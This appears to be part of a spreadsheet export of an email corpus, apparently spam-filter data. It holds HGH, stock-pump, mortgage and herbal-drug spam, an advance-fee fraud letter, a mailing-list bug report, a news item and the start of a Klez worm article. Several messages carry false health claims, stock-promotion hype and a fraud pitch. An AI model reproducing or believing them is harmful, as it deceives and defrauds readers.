JOmDv!yBYDIRw@jNaTRYaXSW*kvFKVTo%!%g$qxRKTDbC%nMIUzCajIYTraDnd!*VlPmRAjZjAYDSIev*QYap!taWLKB^ouWovruzpBpIqW@XuSSSD*IsXQeYyn0xads*@uftIhbZprWFm@woOsyg&amp;LB*mYRwzKVzJQkZOkQZcZSLJFnf$$!PZBYdkS@Rznta@JJvzyM0KdXE^b@PsziiOAdpwaGWHmcOTO*OEBYxYijoYQnXYMgqcaHKL*QYa$UT@gacwiAQAoNFnuFSOA%*OQnqZZsakcaKMs!JNmJMNnDbnmpARGtEPNhga$LDhug^XK^kl&amp;ahu@&amp;iizEaZXvpBDzqN&amp;qaS&amp;ajG^eGCPXeRrrvSpx0DW@OFjuBDFQpFKmBBnIRPVc!v!JeUDJwul@k%uLTM%EPHn@XyBnPl!F0YArHnEh*jbiD0XSUBZDvtPNczX$mUoAjJ%QgIAJ!OihQo*DqRPSELij%CBkZYt%PBIG&amp;wRERA!PbKXxwTZwVeXRxtMhwCDeI*$kdsAnabTemiU!fCKAsZ$!^wS0q*mNCfptyuheM@za&amp;s0F%0$i%MUteNZnTAuBi0OZ%uhexwaBOKtPCslKMX&amp;VfdJeWUWwB@wkm!FklpMxYFhAJqHXjm0AjR^hdgWWBqTQNMKhZJfVYA%Eku%jQWHdaxfdCChhqqSNKbch$TaxxfhH!X^&amp;ToY&amp;srxzRJGlpmHjjJYnfc0T%mEJPErggsT@vQJdB^r!p*vW&amp;nVMZFMWqLyOusfVptDNXgwOSTgtwSEgmzP%I&amp;mK%%u&amp;oFCltYodqlzs*Gcnb0NJVmYRC!%!eltPRu%CpjzXLtahDXcqDYEJ$&amp;kMcU&amp;vxrTqRpyAKxQDeuLR@uHJSDlIp%cJClnfNT!ZczYKwDR!pPLIbzIeLW*oBHHuORjCqbIcuimuV$ZIA%HYGvVejpBy^IBjSuLtdrJm*</t>
  </si>
  <si>
    <t xml:space="preserve">
Lose weight while building lean muscle mass  and reversing the
ravages of aging all at onceThe following message was sent to you as an opt-in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(HGH) 
are changing
the way we think about aging and weight loss.Lose
Weight
Build
Muscle Tone
Reverse
Aging
Increased
Libido
Duration
Of Penile Erection
 New
Hair Growth
 Improved
Memory
 Improved
skin
 New
Hair Growth
 Wrinkle
Disappearance Visit
Our Web Site and Lean The Facts: Click Here
You are
receiving this email
         as a subscriber to our mailing list. To remove yourself
         from this and related email lists click here: UNSUBSCRIBE MY
EMAIL         Under Bill(s) 1618 TITLE III by the 105 US Congress, per Section
         301, Paragraph(a)(2)of S. 1618, a letter cannot be considered
         Spam if the sender includes contact information and a method
         of "removal".</t>
  </si>
  <si>
    <t xml:space="preserve">Dear jm@netnoteinc.com :
Did you miss out on 
ENVC, UP 280%?, PRCT, UP 300%? HUMT, UP 200% and others? 
NOW What are you waiting for?
Here's another pick - 
Another potential big Play
Â 
      Â  
      PLAY OF THE WEEK OTCBB: 
      NNCO
Â Â Â 
Â 
   MicroCap  MarketingÂ PLAY OF THE WEEKÂ   for ourÂ investors 
      this   week 
      is NANNACO, INC.    (OTCBB: NNCO   ).Â  If you tuned 
      in 
      to our last two picks, you would have noticed that , Â PRCT wentÂ fromÂ a close 
      of $.025 to a high of $0.12.Â  That's a 300% gain in just two days.Â  
      Our other 
  pick, HUMT, almost gained over  200%. PLAY OF THE WEEK tracks stocks on downward trends, foresees 
      bottom and notify our subscribers of it potentialÂ upward movement.Â  We 
      also look for newly trading companies, and stocks that by comparing 
      trading history and shares in the marketplace we believe have great levity 
      upward. 
NNCO - 
      Shares Outstanding
    - CLICK 
      HEREÂ   NNCO - Shares Traded
      - 
      CLICK HERENNCO - Market MakersÂ  - 
      CLICK HEREÂ Â Â Â Â Â  Our 
      LastÂ Plays
PRCT UP 
      300%
SYPY UP 
      310%
IGTT UP 
      160%
UP In 
      JustÂ 3-5Â Days
Â Â Â Â Â Â Â Â Â Â Â Â Â Â Â  Â Â Â Â Â  
 Â Â  MicroCap 
      Marketing PLAYOF THE WEEK.Â  Our trademark is our 
      uncanny ability to spot stocks that have bottomed-out and anticipate their 
      rebound and upward trend.Â  Most of the stocks we track rebound and 
      peak within just two days, giving investors opportunity to make a few 
      bucks back in such a highly volatile market.Â  We don't believe the 
      market is such as to take any long-term positions right now.Â  But in 
      a highly unstable marketplace, the opportunities for short-term stabs 
      (gains) are abundant.Â  When the question today seems to be which way 
      is up, we like to think that from the bottom there is no other way---it's 
      all a matter of 
timing.
If you want to receive future Picks click 
here
I no longer wish to receive your newsletter click 
hereksxqtfdeqfehbhysh
</t>
  </si>
  <si>
    <t xml:space="preserve">Did you hear? Interest rates have just been lowered again. Don't delay! Get your free mortgage rate quote now and see how much you could save every month!
Free, no obligation quote:
http://www.toplinequotes.com/freequote/
---------------------------------------
To be removed, go to: 
http://www.toplinequotes.com/unsubscribe/
Allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">
Want To Be Your Own Boss? Â  Train Now With Self-Paced Home Study
Thousands of people -- people just like you -- are able to work from home thanks to the convenience of distance learning courses from PCDI.BONUS! $200 tuition discount when you enroll!
PCDI offers over 40 popular career training programs, including: 
â€¢ 
                                  Medical Transcriptionâ€¢ 
                                  Medical Billingâ€¢ 
                                  Electricianâ€¢ 
                                  Interior Decoratingâ€¢ 
                                  Child Day Careâ€¢ 
                                  Private Investigationâ€¢ 
                                  And more!High School Diploma. Start where you left off in 9th - 12th grade.
Associate's Degree Programs. Take your education further: earn your nationally accredited degree inâ€¢ Paralegal Studiesâ€¢ Criminal Justiceâ€¢ Early Childhood Educationâ€¢ Accountingâ€¢ Health Care Managementâ€¢ Small Business Managementâ€¢ Human Resource Managementâ€¢ And more!
CLICK HERE NOW! Order your FREE Career Information Kit. Enjoy a $200 tuition savings when you enroll in any one of our nationally accredited courses!
FREE home study career information kit
PCDI's nationally accredited home study programs will fit into the busiest lifestyle -- without disrupting your work, family life, or leisure activities.
â€¢Comprehensive study materials are mailed to your homeâ€¢Enjoy self-paced lessons and open-book examsâ€¢Affordable, interest-free monthly tuitionâ€¢No commuting, no parking fees, no pressure!â€¢Receive your diploma at graduation
Send for your FREE Career Information Kit now -- CLICK HERE NOW! Find out how you can study at home, work at home, and succeed!You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http://www.frugaljoe.com/unsubscribe.php?eid=396068\~moc.cnietonten^^mj\~1754388\~12a1
Third-party advertisements, from lines, and subject lines contained in this email are the sole responsibility of the advertiser.
 </t>
  </si>
  <si>
    <t xml:space="preserve">Dear Subscriber,If I could show you a way to get up to 10,000 visitors a day to your web site, noting that it will cost you no money, and only 30 minutes a day of your time would you be interested?Click on the link (or copy and paste to your browser) for more information:http://www.worldbizservices.net/your/mpam/moreinfo.aspAnd I promise you this is not some disguised solicitation for money. You do not need to outlay a single, solitary dollar, pound, punt, rand, mark or euro for this 12 step lesson plan to work for you.This is a marketing strategy that out-performs anything you have seen before. Register for free and you will learn how to combine the synergistic potential of over 50 free programs.Click on the link (or copy and paste to your browser) to see the proof:http://www.worldbizservices.net/your/mpam/moreinfo.aspOur main site receives over 28,000 visitors a day, with each visitor averaging 2.8 page views. We have received over 11 million visitors since we began!Over 117,000 people worldwide have joined this program during the 10 months it has been operating.Act today - click on the link (or copy and paste to your browser) to join them in their success:http://www.worldbizservices.net/your/mpam/moreinfo.aspMy very best wishesMikep.s. This 12 step instruction course is absolutely free, and once you have completed it only an hour or less a day is needed to get thousands of visitors to any website you choose!http://www.worldbizservices.net/your/mpam/moreinfo.asp********************************************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income.If this is not the case PLEASE accept our sincerest apologies and follow the link below to unsubscribe from our mailing list.http://www.worldbizservices.net/your/unsubscribe.asp********************************************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</si>
  <si>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****Mid-Summer Customer Appreciation SALE!****To express our appreciation to all of our loyal customers, we are offering the following products "2 for 1"  for a limited time only.  Ragga Dagga, Stoney Mahoney, Sweet Vjestika, Aqueous Kathmandu, along with a free 1oz. package of Capillaris Herba.We have three (3) NEW Renegade Botanicals From Exotic Botanical Resources, the ethnobotanical herbalists who brought the herba supplementals Kathmandu Temple Kiff 1 &amp; 2 Personal Choice, pipe-smoking products/substances to the common market!Announcing:1.  Temple 3 Ragga Dagga (tm)
2.  Aqueous Kathmandu (tm)
3.  Stoney Mahoney (tm)***********************************
TEMPLE 3 RAGGA DAGGA
***********************************We are finally able to offer for your Sensitive/Responsive, Personal Choice Smoking Enjoyment, the Temple 3 Ragga Dagga (tm) Pipe-Smoking Substance Supplemental Product.  Introduced after three years of research and development, Temple 3 is Personal Choice, legal Smoking/Indulgence Redefined!!!  Thanks to recent, dramatic, technological advances in the laboratorial processes for the extraction of alkaloid and glycocide supplements from botanicals/herbas/plant matter, we are now able to offer, in more cultivated/enhanced/viripotent/substantiated format, what had actually already been the most significant, lawful, Personal Choice smoking substance available on the planet.  Temple 3 Ragga Dagga (tm) is the sweet, sweet evolution of all of that. * A 20 X more viripotent herba supplement than its predecessors (Temple 1 &amp; 2)! 
* Happier, happy smoking!
* Indeed, a depressive/regressive, supplemental mood-enhancer.
* More sophisticated, uplifting &amp; poised than illegal smoking substances.
* NO regulation; NO illegality; NO failed drug tests!
* Inhibits stress &amp; anxiety!
* Inspires conteplativeness &amp; creativity!
* Ehances the sexual experience!
* Generates more restful sleep &amp; lucid dreaming!
* A significant herba/botanical supplement in the battles against drug &amp; alcohol dependence!
* Easily ignited &amp; stoked.
* Smokes sweetly!
* Absolutely legal; non-invasive; no downside!
* Lingers for a good, goodly while!
* Possesses many fine ganja virtues with none of the negatives!
* Just a little snippet/pinch goes a long, long way.  Just 4 or 5 draws of your pipe (a traditional hand herb-pipe is included with each package of Temple 3 Ragga Dagga).Temple 3 Ragga Dagga (tm) is an exclusive, botanical/herba, proprietary, Nepalese-formulated, "Sensitive/Responsive" pipe-smoking/stoking substance, and it is undoubtedly the most prestigious, legal offering of its sort on the planet!So smokin' stokin' potent is this cutting edge formulation, that we have even been able to establish a very happy clientele market base within the hard-core stoner arena and have made positive, happy, smoking differences in many, many lives.ABSOLUTELY LEGAL!  MARVELOUSLY POTENT!!A one-of-a-kind, proprietary amalgamation, comprised of extreme high-ratio concentrated extracts which are derived from various common and uncommon "sensitive/responsive" herbas primarily cultivated within and imported from the southern and eastern hemispheres ... Temple 3 Ragga Dagga (tm) high-ratio, factored, botanical extractions are master-crafted into solid jiggets/bars which are structurally reminiscent of what one might find in the "happiness" coffee and tea houses of Nepal, Kathmandu or Amsterdam, and in many aspects, possesses a more collected and more focused, less-scattered ambience. Ingredients:Temple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 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AQUEOUS KATHMANDU
*********************************For those who choose not to smoke ... we have something for you.  Introducing Aqueous Kathmandu "Happy Drops" (tm).Aqueous Kathmandu (tm) "Sensitive/Responsive" Happiness Drops....(Temple "Quantum" Variety)....Indeed; a Happiness Brew from the Kathmandu....a.k.a. "Secret Fire"....from a toke-smoke point of view, if you know what I mean and be groovin' the scene.... Who du the Kathmandu?  Now....everybody can du the Kathmandu!  (that is, if you're 21 years of age or older....)  Aqueous Kathmandu is engaged to holistically inspire and instill "sensitive/responsive"; happiness and mellowness without the detriment of carcinogenic inhalation (smoking).  Aqueous Kathmandu is absolutely legal and does not contain any controlled, considered to be harmful or regulated herbs or cannabis/marijuana factors!!!! As "smoking" has become so socially taboo over the years and as so many people have asked us for a liquid product, we have long strived to bring a quantum-factored/concentrated liquid product to fruition. This has been no easy task for a variety of botanical and technological reasons.  Finally; we are able to say that this task has been accomplished....a "Sensitive" herbal/botanical awakening, if you will....as we have introduced and brought to market Aqueous Kathmandu (tm) Happiness Drops, Temple "Quantum" Variety, a.k.a...."Secret Fire".  "Secret fire"....indeed!!!This liquid innovation affords us four factors within this particular botanical equation that were previously not realized....
1) The ability to engage a more substantial, high-ratio, concentrated application of particular botanical factors that are utilized in our personal-choice, "sensitive/responsive" pipe-smoking product.
2) The ability to extract high-ratio concentrates of certain botanical factors that are not applicable to a smoking commodity, as they cannot be extracted into dry format.  (Please note....all botanical factors included in all/any of our products are absolutely legal.  In the instance of Aqueous Kathmandu, we are simply able to enjoy the advantages of specific legal herbas that just are not dry concentrate-applicable.
3) A most notable assimilation factor....being that liquid is more easily and therefore more generally metabolistically assimilated and as such, more "absolute"; in that herba/botanical applications via the administrative vehicle of "Smoke" possess a much wider variance in just how efficiently that "Smoke" is integrated metabolistically, psychologically and perspectively
4) Therein, we have created a unique uniqueness between a "Smoke" and a "non-Smoke"....sort of like the camaraderie between indicas and sativas, if you will....different aspects of the same botanical genus arrangement.  Each "impeccable" singularly.... And at this juncture we will also mention to those of you who are not so anti-smoking something....that Aqueous Kathmandu (tm) Happiness Drops and the more traditional Temple "3" Ragga Dagga (tm) personal-choice, pipe-smoking substance indeed establish an enchanting "camaraderie". (Please refer to, "Introductory Offers".) * No need to smoke.  No carcinogenic factors!
* Absolutely legal!  No prescription required!
* Does not include cannibis or any tobacco variety.
* Marvelously potent.  Remarkably substantial!
* Inspires contemplativeness and creativity!
* Adjusts attitude &amp; mood enhancement. Relaxes stress &amp; anxiety.
* Better than Kava Kava, St. John's Wort, etc.  Similar to but variant from Ragga Dagga.
* Certainly safer than pharmaceuticals!
* Many fine ganja virtues with none of the negatives!
* Better sleeping ... better dreaming.
* Non-invasive ... no downside.
* An exquisite compliment with Temple 3 Ragga Dagga (tm) -- (See Intro Offers)
* Quite simply ... it is a Superior product!Contents: Aqueous Kathmandu is a unique botanical substantiality.  It is offered and marketed as such.  Undisputedly, it achieves "distinctive accolade" of its own merit....  Aqueous Kathmandu is absolutely legal and does not contain any controlled or regulated or harmful herbs or cannabis factors.  However, it is our mandatory ethical policy that Aqueous Kathmandu not be offered to individuals who have not yet attained at least 21 years of age (all things in their time....).  Please note as well that Aqueous Kathmandu is not intended for usage during work or while driving.  And, as is true of all substance and indulgence, this product should not be enjoyed during pregnancy.  This proprietary formulation does include the following quantum-ratio, core-extracted/refined botanicals in an alcohol base as a preservative: Albizzia flower-tops, Drachsha, Chavana Prash, Lactuca Virosa, Hybrid Flowering Turnera Diffusa, Wild Dagga, Capillaris Herba, Angelica Root, Zizyphi Spinosae, Buplerum, Hybrid Valeriana officinalis Root, Albizzia flower-tops, mature Polygonum Vine, Calea Zacatechichi, Crocus Sativa flower-tops, Leonorus Sibricus buds, Cinnabaris, Margarita herba, Biotae Orientalis, Salviae Miltiorrhizae.... Usage Instructions: Shake well. Mix 30-50 drops with juice or water (best on empty stomach). Ambiance lasts about two hours or so. Not intended for use during pregnancy or while working or driving. Keep out of reach of children.**************************
STONEY MAHONEY
**************************In regard to the introduction of Stoney Mahoney (tm) "personal choice" smoking substantiality product, we have strived for years to develop a consummate "Sensitive/Responsive" (loose-leaf) smoking product, "Amsterdam Cup" style so to speak!With acquired knowledge via the development of such notable "personal choice" smokeables, as Wizard Smoke (tm), Dream Smoke (tm), Dragon Smoke (tm), Vajroli Mudra (tm), Stashish (tm), ShemHampHorash (tm), Yerba lena Yesca (tm), WeedÃ© (tm), Kathmandu Temple Kiff (tm) 1 &amp; 2 &amp; 3, which for the most part have been proprietary formulations, of which the rights have been sold to other less aggressive, less developmental companies, we arrived at the lofty "personal choice" smoking status of our premier Ragga Dagga (tm) solid pipe-smoking product.  After all of this, we had come to the technological and philosophical point of view that we could not conjure a loose-leaf formulation that would provide effectuality that would be more significant than that of our much-heralded Ragga Dagga (tm) solid-format pipe smoking product.  Mostly, we were right about this, as this new Stoney Mahoney "agenda" is not so much significant as in "better", but "Signature Significant" as in "uniqueness," in that we chanced upon a new world class, botanical source for the rare "true-brid" variety of Artemisia absinthum (flowering tops only), which at one time in history was distilled into "Absinthe," a greenish, aniseed flavored liqueur which heralded certain euphoric and narcotic attributes which ultimately resulted in it being declared illegal.  As well, we have finally perfected our exclusive "kiffening" technique, which inspires and establishes alkaloid and glycoside potentiation (enhancement) on a molecular level.  Hence, we introduce (although supply is limited) this highly "potentiated" Stoney Mahoney (tm) smoking product! Loose-leaf "personal choice" doesnâ€™t get any "sweeter" than this!  And for all of you Ragga Dagga fans, please note that, indeed, it isnâ€™t so much that Stoney Mahoney loose-leaf is more viripotent than the Ragga Dagga solid-format.  Moreover, it is that Stoney Mahoney is effective in a much different way than Ragga Dagga.  Sort of like apples and oranges, like Panamanian and Jamaican, like Indica and Sativa, if you will!  Within our test marketing, even traditional "Kind Bud" aficionados have magnanimously acclaimed this Stoney Mahoney jester variety.  Most folks say that Ragga Dagga motivates them in an up "Sativa" sort of way, and that Stoney Mahoney mellows them out or giggles them out in a "soma," Indica sort of way.  If Stoney Mahoney has any shortcoming at all, it is quite simply that due to the extreme "kiffening" of this product, it may be to the uninitiated practitioner, a harsh draw.  It is for this reason that in addition to the inclusion of a standard herb pipe and package of rolling papers, we also include a brass, personal water-pipe (hookah).  As is true for many high-minded folks, a water-pipe filled with chilled water or wine will temperament the demonstrativeness of Stoney Mahoneyâ€™s draw.  * Indica oriented.
* Definitely happy smoking!
* Mood enhancer.
* Smokeable &amp; brewable mood food!
* Good-bye stress, anxiety, &amp; restlessness.
* Sleep deep -- Good-bye funky dreams!
* Hornier than horny goatweed!
* Superlative mixer with Ragga Dagga and/or Aqueous Kathmandu.
* Roll it or bowl it or brew it ...
* Just a pinch goes a long, long way ...
* Possesses many fine ganja virtues with none of the negatives.
* Non-invasive.
* Absolutely Legal!
* Rolling papers, herb pipe &amp; personal brass water pipe (hookah)are included.Attention! Attention! We have, by popular demand and in the interest of good economics, created an introductory offer that features both Ragga Dagga and Stoney Mahoney products and, also, still another introductory offer which includes Ragga Dagga, Stoney Mahoney and, for you non-smokers, our Aqueous Kathmandu Happiness Drops (these are pretty special!).  And to mention furthermore, for non-smokers, Stoney Mahoney (Jester Variety) loose-leaf product is also a brewable delight.  A tea for theeâ€¦.)Please Note:  Stoney Mahoney (Jester Variety) (tm) is an absolutely legal, herba/botanical, "Personal Choice," loose-leaf substantiality smoking product!  No included botanical factor therein is regulated by law or considered to be harmful by regulatory agencies.  There is no tobacco in Stoney Mahoney (Jester Variety) (tm).  There is certainly no cannabis/marijuana in Stoney Mahoney (Jester Variety) (tm).  And although we are not age-governed by law, Stoney Mahoney (Jester Variety) (tm) is intended exclusively for sophisticated adult usage! Subsequently, it is our MANDATORY ethical policy that Stoney Mahoney (Jester Variety) (tm) may not be sold, offered, or given to any person that has not attained at least twenty-one years of age.  As well, Stoney Mahoney (Jester Variety) (tm) is not intended for use during work or while driving.  It should not be enjoyed during pregnancy nor is it intended to supercede physician's care in any regard.Stoney Mahoney (Jester Variety) (tm), factored in an Absinthium Labyrinthine Configuration, is an exclusive, kiffened, loose-leaf, primo modino, "Sensitive/Responsive," Smoking and/or Brewing Herba which may be, depending upon preference, rolled or bowled or brewed.As is an herbalistâ€™s way, three or four draws of Smoke should be inhaled and retained.  For the non-smoker, it is most appropriate to engage this herba as a potentiated tea/brew.  (Steep approximately one tea-spoon of Stoney Mahoney herba per one cup of water for ten minutes or so &amp; strain.)  When smoking Stoney Mahoney, please draw gently as Stoney Mahoney is a most preeminent "Sensitive/Responsive" Smoke and may be considered to be a harsh draw to the uninitiated practitioner.  (Water-pipe is included with each package of Stoney Mahoney (Jester Variety).)Stoney Mahoney contains and is kiffened with the following exotica botanicals and botanical extracts &amp; essences: Dutch Lactuca virosa, Bulgarian Artemisia absinthum (flowering-tops only), Yucatan Turnera aphrodisaca, Chinese Valeriana ceae, Jamaican Verbena officinalis, Spanish Peumus boldo, and European (flowering-tops only) Sarothamnus Scoparius. Stoney Mahoney does not include any tobacco or any cannabis factors. Stoney Mahoney does indeed achieve distinction upon its own merit....*************************************************
*************************************************We offer other fine herbal, botanical products including the following:1.  Sweet Vjestika Aphrodisia Drops (tm); An erotic aphrodisia; sexual intensifier / enhancer liquid amalgamated extract for MEN and WOMEN.
2. "Seventh Heaven" Prosaka Tablets (tm); a botanical alternative to pharmaceutical medications for calm, balance, serenity and joyful living ... 3. "Seventh Heaven" Gentle Ferocity Tablets (tm); a most efficacious, non-caffeine, non-ephedrine, non-MaHuang botanical energizer and cutting-edge appetite suppressant...4.  Extreme Martial Arts Botanical Remedies; Equivalence Tablets &amp; Dragon Wing Remedy Spray ... pain management that works to alleviate pain even for arthritis and fibromyalgia sufferers...5.  Cockle Doodle Doo (tm) Penile Restorative/Renewal/Enhancement Souffle' ... an exclusive, proprietary blendage created to dramatically/emphatically, aggrandize/enhance &amp; age-inhibit penile skin quality and vascular composure.  Soothes, refreshes, provides a youthful Glow &amp; Go sensitivity.    6.  "Hairricane" (tm) -- an Extreme High-Ratio, Dry Botanical Extract Herba Dietary Hair Supplement for Men &amp; Women========================================================PRICING INFORMATION:1.    TEMPLE 3 RAGGA DAGGA (tm)
One     .75 oz. jigget/bar          $65.00
One    2.0 oz. jigget/bar          $115.00 
2.    AQUEOUS KATHMANDU "HAPPY DROPS" (tm)
One - 2 oz. bottle (90+ usages)    $115.00
Two - 2 oz. bottles                $170.003.    STONEY MAHONEY (tm) Jester Variety Loose Leaf
One - 2 oz. package 		   $150.00
Two - 2 oz. packages               $225.00
Each 2 oz. package of Stoney Mahoney includes 
1 pkg. of clipped-rolling papers, a traditional
herb pipe &amp; a brass, personal water-pipe (hookah).Sorry, but due to a limited supply of Stoney Mahoney (Jester Variety) only a maximum purchase of two - 2 oz. packages per customer is allowed per order.4.    SWEET VJESTIKA APHRODISIA DROPS (tm)
One	1.0 oz. bottle		$90.00   
Two	1.0 oz. bottles	       $140.00  
5.    SEVENTH HEAVEN PROSAKA (tm)
One    100 tablet tin          $40.00
Three  100 tablet tins        $105.00
Six    100 tablet tins        $185.00
6.    SEVENTH HEAVEN GENTLE FEROCITY (tm)
One   300 tablet jar          $130.007.    Equivalence Tablets - Each bottle contains 90 - 500mg tablets.
**  3-pack  (270 tablets)    $83.00
**  6-pack  (540 tablets)    $126.00 (save $40.00)
**  9-pack  (810 tablets)    $159.00 (save $90.00)
**  12-pack (1,080 tablets)  $192.00 (save $140.00)8.    Dragon Wing Spray Remedy - Each spray bottle contains 4 liquid oz.
**  3-pack  (3 - 4 oz. bottles)     $83.00
**  6-pack  (6 - 4 oz. bottles)     $126.00 (save $40.00)
**  9-pack  (9 - 4 oz. bottles)     $159.00 (save $90.00)
**  12-pack (12 - 4 oz. bottles)    $192.00 (save $140.00)9.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$80.00)10.  COCKLE DOODLE DOO (tm) Souffle
One (1) 2 oz. jar ..........   $92.00
Two (2) 2 oz. jars .........  $176.00
Six (6) 2 oz. jars .........  $320.00
11.  "HAIRRICANE" (tm)
**  3 Pack (3 bags of 90 capsules each)..... $102.00
**  6 Pack (6 bags of 90 capsules each)..... $174.00 (SAVE $30)
** 12 Pack (12 bags of 90 capsules each).... $288.00 (SAVE $40)12.  ALPHA INTRODUCTORY OFFER
* One (1) 2 oz. pkg. of Stoney Mahoney
* One (1) 2 oz. jigget/bar of Temple 3 Ragga Dagga
Price:  $190.00 (Reg. $265.00  Save $75)13.  BETA INTRODUCTORY OFFER
* One (1) 2 oz. pkg. of Stoney Mahoney
* one (1) 2 oz. pkg. of Temple 3 Ragga Dagga 
* One (1) 2 oz. bottle of Aqueous Kathmandu Happiness Drops
Price:  $240.00 (Reg. $380.00  Save $140)14.  INTRO OFFER "A"
* One (1) 2.0 oz. jigget/bar of Temple 3 Ragga Dagga
* One (1) tin (100 tablets) of Seventh Heaven Prosaka
* One (1) jar (300 tablets) of Seventh Heaven Gentle Ferocity 
Price:  $200.00 (Reg. $285.00  Save $85) 15.  INTRO OFFER "B" 
* One (1) 2.0 oz. jigget/bar of Temple 3 Ragga Dagga
* One (1) jar (300 tablets) of Seventh Heaven Gentle Ferocity.  
Price:  $170.00 (Reg. $245.00  Save $75) 16.   INTRO OFFER "C"
* One (1) 2.0 oz. jigget/bar of Temple 3 Ragga Dagga
* One (1) tin (100 tablets) of Seventh Heaven Prosaka.  
Price:  $125.00 (Reg. $155.00  Save $30) 17.  INTRO OFFER "D"
* One (1) 2.0 oz. jigget/bar of Temple 3 Ragga Dagga
* One (1) 1 oz. bottle of Sweet Vjestika Aphrodisia Drops.
Price:  $150.00 (Reg. $205.00  Save $55)  
18.  INTRO OFFER "E"
* One (1) 2.0 oz. jigget / bar of Temple 3 Ragga Dagga
* One (1) 1 oz. bottle of Sweet Vjestika Aphrodisia Drops
* One (1) tin (100 tablets) of Seventh Heaven Prosaka
* One (1) jar (300 tablets)of Gentle Ferocity 
Price:  $260.00 (Reg. $375.00  Save $115)  19.  INTRO OFFER "F"
* One (1) 2 oz. jar of Cockle Doodle Doo Souffle'
* One (1) 2 oz. jigget/bar of Temple 3 Ragga Dagga
* One (1) 1 oz. bottle of Sweet Vjestika Love Drops
Regular Price $297.00.  Yours for only $197.00.  SAVE $100.00!20.  INTRO OFFER "H"
* One (1) 2 oz. bottle of Aqueous Kathmandu
* One (1) 2 oz. bar/jigget of Temple 3 Ragga Dagga
Price:  $155.00 (Reg. $230.00  Save $75)21.  INTRO OFFER "I"
* One (1) 2 oz. bottle of Aqueous Kathmandu
* One (1) 2 oz. bar/jigget of Temple 3 Ragga Dagga
* One (1) 1 oz. bottle of Sweet Vjestika
Price:  $235.00 (Reg. $320.00  Save $85)22.  INTRO OFFER "J"
* One (1) 2 oz. bottle of Aqueous Kathmandu
* One (1) 2 oz. bar/jigget of Temple 3 Ragga Dagga
* One (1) 1 oz. bottle of Sweet Vjestika
* One (1) 300 tablet jar of Gentle Ferocity 
Price:  $295.00 (Reg. $450.00  Save $155)23.  INTRO OFFER "K"
* One (1) 2 oz. bottle of Aqueous Kathmandu
* One (1) 1 oz. bottle of Sweet Vjestika
Price:  $150.00 (Reg. $205.00  Save $55)**************************************************
ORDERING INFORMATION:
For your convenience, you can call us direct with your orders or questions.
Call 1-623-972-5999
Monday - Saturday -- 9:00 AM to 6:00 PM (Mountain Time)
For all domestic orders, add $7.00 shipping &amp; handling (shipped U.S. Priority Mail).  Add $22.00 for International orders.====================================================
To remove your address from our list, click on the following link and send a blank email.  mailto:adsub68@btamail.net.cn?subject=Remove</t>
  </si>
  <si>
    <t xml:space="preserve">ATTN:SIR/MADAN                            STRICTLY CONFIDENTIAL.I am pleased to introduce myself  to you.My name is Mr. Wilson Kamela a native of South Africa and a senior employee of mines and natural resources department currently on a trainning course in Holland for few months.I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amouth.Since this money can be paid directly into any bank account of your choice,you have responsibility to ensure that my partner and Ireceive(70%)of the total amouth.While the balance (5%) will be set aside for any unforseen expenses in the cause of transfering this money.I will appreciate if you can give your assurance and guarantee that our share will be well secured.Please for the sake of confidentiality,reach me on my e-mail address:  wilsonkamela3000@mail.com .  Please let me know if this proposal is acceptable to you. Kindly reach me immediately with any of the stated contact addresses so that better clearifications 
relating to the transaction will be explained to you.
Truly yours,
Wilson Kamela. 
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Wed, 21 Aug 2002 10:54:46 -0500
    From:        Chris Garrigues 
    Message-ID:  &lt;1029945287.4797.TMDA@deepeddy.vircio.com&gt;
  | I can't reproduce this error.For me it is very repeatable... (like every time, without fail).This is the debug log of the pick happening ...18:19:03 Pick_It {exec pick +inbox -list -lbrace -lbrace -subject ftp -rbrace -rbrace} {4852-4852 -sequence mercury}
18:19:03 exec pick +inbox -list -lbrace -lbrace -subject ftp -rbrace -rbrace 4852-4852 -sequence mercury
18:19:04 Ftoc_PickMsgs {{1 hit}}
18:19:04 Marking 1 hits
18:19:04 tkerror: syntax error in expression "int ...Note, if I run the pick command by hand ...delta$ pick +inbox -list -lbrace -lbrace -subject ftp -rbrace -rbrace  4852-4852 -sequence mercury
1 hitThat's where the "1 hit" comes from (obviously).  The version of nmh I'm
using is ...delta$ pick -version
pick -- nmh-1.0.4 [compiled on fuchsia.cs.mu.OZ.AU at Sun Mar 17 14:55:56 ICT 2002]And the relevant part of my .mh_profile ...delta$ mhparam pick
-seq sel -list
Since the pick command works, the sequence (actually, both of them, the
one that's explicit on the command line, from the search popup, and the
one that comes from .mh_profile) do get created.kreps: this is still using the version of the code form a day ago, I haven't
been able to reach the cvs repository today (local routing issue I think)._______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">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Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Man Threatens Explosion In Moscow Thursday August 22, 2002 1:40 PM
MOSCOW (AP) - Security officers on Thursday seized an unidentified man who
said he was armed with explosives and threatened to blow up his truck in
front of Russia's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ITAR-Tass and Interfax reported, citing witnesses.
The man later drove away from the building, under police escort, and drove
to a street near Moscow's Olympic Penta Hotel, where authorities held
further negotiations with him, the Moscow police press service said. The
move appeared to be an attempt by security services to get him to a more
secure location. ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/mG3HAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t>Klez: The Virus That Won't Die
Already the most prolific virus ever, Klez continues to wreak havoc.Andrew Brandt
&gt;&gt;From the September 2002 issue of PC World magazine
Posted Thursday, August 01, 2002
The Klez worm is approaching its seventh month of wriggling across 
the Web, making it one of the most persistent viruses ever. And 
experts warn that it may be a harbinger of new viruses that use a 
